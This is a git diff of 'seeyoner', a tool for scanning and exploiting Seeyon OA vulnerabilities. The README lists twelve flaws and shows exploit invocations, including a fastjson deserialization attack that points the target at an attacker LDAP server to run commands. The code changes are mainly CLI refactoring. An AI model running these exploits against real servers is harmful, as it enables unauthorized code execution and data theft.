diff --git a/README.md b/README.md index 8047ffd..4296b94 100644 --- a/README.md +++ b/README.md @@ -1,67 +1,68 @@ - # seeyoner + 致远OA漏洞利用工具 -## Usage -``` + +## 使用方式 + +```shell D:\>seeyoner.exe -h - seeyoner v1.0 by x51 -Usage:seeyoner.exe -u http://192.168.1.1:8080/ -vn all -m scan -Options: - -a string - run mode ldap args - -c string - run mode command args - -h print this help info. - -m string - mode:scan/run - -show - show vuln list. - -u string - target url. - -vn string - vuln number,[1,2,...] -``` -### scan -全漏洞探测: -``` -seeyoner.exe -u http://xxx.com -vn all -m scan +一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。 + +Usage: + seeyoner.exe [command] + +Available Commands: + exploit 漏洞利用 + help Help about any command + list 列出所有漏洞信息 + scan 漏洞检测 + +Flags: + -h, --help help for main.exe + +Use "seeyoner.exe [command] --help" for more information about a command. ``` -![image](https://user-images.githubusercontent.com/45651912/124346939-31545880-dc14-11eb-8fa2-7dbb69aae836.png) -指定漏洞探测: -`-vn`指定漏洞编号,可通过`-show`参数查看: +### 漏洞信息 +```shell +D:\>seeyoner.exe list +【1】seeyon<8.0_fastjson反序列化 +【2】thirdpartyController.do管理员session泄露 +【3】webmail.do任意文件下载(CNVD-2020-62422) +【4】ajax.do未授权&任意文件上传 +【5】getSessionList泄露Session +【6】htmlofficeservlet任意文件上传 +【7】initDataAssess.jsp信息泄露 +【8】DownExcelBeanServlet信息泄露 +【9】createMysql.jsp数据库信息泄露 +【10】test.jsp路径 +【11】setextno.jsp路径 +【12】status.jsp路径(状态监控页面) ``` -D:\>seeyoner.exe -show -漏洞列表: -1、seeyon<8.0_fastjson反序列化 -2、thirdpartyController.do管理员session泄露 -3、webmail.do任意文件下载(CNVD-2020-62422) -4、ajax.do未授权&任意文件上传 -5、getSessionList泄露Session -6、htmlofficeservlet任意文件上传 -7、initDataAssess.jsp信息泄露 -8、DownExcelBeanServlet信息泄露 -9、createMysql.jsp数据库信息泄露 -10、test.jsp路径 -11、setextno.jsp路径 -12、status.jsp路径(状态监控页面) +### 漏洞检测 + +#### 全漏洞探测 + +```shell +seeyoner.exe scan -u http://xxx.com -i 0 ``` -探测seeyon<8.0_fastjson反序列化漏洞: +#### ![](./images/image-20230802155022124.png) 指定漏洞探测 + + +以探测seeyon<8.0_fastjson反序列化漏洞为例,指定编号为`1`: ``` -seeyoner.exe -u http://xxx.com -vn 1 -m scan +seeyoner.exe scan -u http://xxx.com -i 1 ``` -### run +### 漏洞利用 以Session泄露+zip文件上传解压为例,指定编号为`2`: +```shell +seeyoner.exe exploit -u http://xxxx.com -i 2 ``` -seeyoner.exe -u http://xxxx.com -vn 2 -m run +seeyon<8.0_fastjson反序列化利用起来比较特殊: +```shell +# seeyoner.exe exploit -u {url}|{ldap}|{cmd} -i 1 +# 示例 +seeyoner.exe exploit -u http://xxxx.com|ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho|whoami -i 1 ``` -![image](https://user-images.githubusercontent.com/45651912/124347038-bb9cbc80-dc14-11eb-8e52-e3292588c350.png) -seeyon<8.0_fastjson反序列化利用起来比较特殊,也只有该漏洞会用到`-a`和`-c`参数: -`-a`指定你的LDAP服务地址,`-c`指定需要执行的系统命令 -``` -seeyoner.exe -u http://xxxx.com -vn 1 -m run -a ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho -c whoami -``` -![image](https://user-images.githubusercontent.com/45651912/124293426-3ae4ae80-db89-11eb-8a68-def2ba248f8d.png) - diff --git a/README1.md b/README1.md deleted file mode 100644 index 8b13789..0000000 --- a/README1.md +++ /dev/null @@ -1 +0,0 @@ - diff --git a/cmd/root.go b/cmd/root.go index 18b831a..28872d6 100644 --- a/cmd/root.go +++ b/cmd/root.go @@ -2,17 +2,23 @@ package cmd import ( "os" + "path/filepath" "github.com/spf13/cobra" ) +var ( + path, _ = os.Executable() + _, exec = filepath.Split(path) +) + var ( url string vulnId int ) var rootCmd = &cobra.Command{ - Use: "Seeyoner", - Short: "Seeyoner", + Use: exec, + Short: exec, Long: `一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。`, } diff --git a/cmd/scan.go b/cmd/scan.go index aa5b7c9..db7fe3c 100644 --- a/cmd/scan.go +++ b/cmd/scan.go @@ -1,6 +1,7 @@ package cmd import ( + "fmt" "Seeyoner/core" "github.com/spf13/cobra" ) @@ -12,8 +13,16 @@ var scanCmd = &cobra.Command{ `, Run: func(cmd *cobra.Command, args []string) { factory := new(core.IFactory) - iScan := factory.NewFactory(vulnId) - iScan.Scan(url) + if vulnId == 0 { + for i :=1 ; i < 13; i++ { + fmt.Print("[", i, "] >>> ") + iScan := factory.NewFactory(i) + iScan.Scan(url) + } + } else { + iScan := factory.NewFactory(vulnId) + iScan.Scan(url) + } }, } diff --git a/images/image-20230802155022124.png b/images/image-20230802155022124.png new file mode 100644 index 0000000..6303ae7 Binary files /dev/null and b/images/image-20230802155022124.png differ diff --git a/makefile b/makefile new file mode 100644 index 0000000..8e7f145 --- /dev/null +++ b/makefile @@ -0,0 +1,31 @@ +# Output File Name +NAME=seeyoner +# Output File Location +DIR=output +$(shell mkdir -p ${DIR}) + +# Go build flags +LDFLAGS=-ldflags "-s -w" +# Go build file +GOFILE=main.go + +default: + go build ${LDFLAGS} -o ${DIR}/${NAME} ${GOFILE} + +all: windows linux darwin + +# Compile Server - Windows x64 +windows: + export GOOS=windows;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Windows-x64.exe ${GOFILE} + +# Compile Server - Linux x64 +linux: + export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Linux-x64 ${GOFILE} + +# Compile Server - Darwin x64 +darwin: + export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${NAME}-Darwin-x64 ${GOFILE} + +# clean +clean: + rm -rf ${DIR} \ No newline at end of file diff --git a/vulners/sy01.go b/vulners/sy01.go index f76745e..7b28f52 100644 --- a/vulners/sy01.go +++ b/vulners/sy01.go @@ -25,9 +25,14 @@ func (s *Sy01) Scan(targetUrl string) { func (*Sy01) Exploit(targetUrl string) { s := strings.Split(targetUrl, "|") + if len(s) != 3 { + color.Red("[x]url参数格式不正确!") + return + } + url := s[0] ldapUrl := s[1] command := s[2] - runResult, err := sy01runcore(targetUrl, ldapUrl, command) + runResult, err := sy01runcore(url, ldapUrl, command) if err != nil { color.Red("[x]漏洞利用异常!") return